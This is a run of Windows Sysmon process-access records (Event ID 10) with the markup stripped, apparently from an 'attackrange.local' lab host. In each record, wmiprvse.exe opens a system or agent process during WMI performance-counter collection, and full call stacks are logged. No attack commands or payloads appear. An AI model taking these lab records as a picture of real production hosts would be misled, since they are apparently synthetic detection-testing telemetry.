21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151029Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151028Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151027Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151026Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151025Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151024Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151023Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151022Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151021Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151020Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151019Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151018Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151017Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151016Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151015Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151014Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 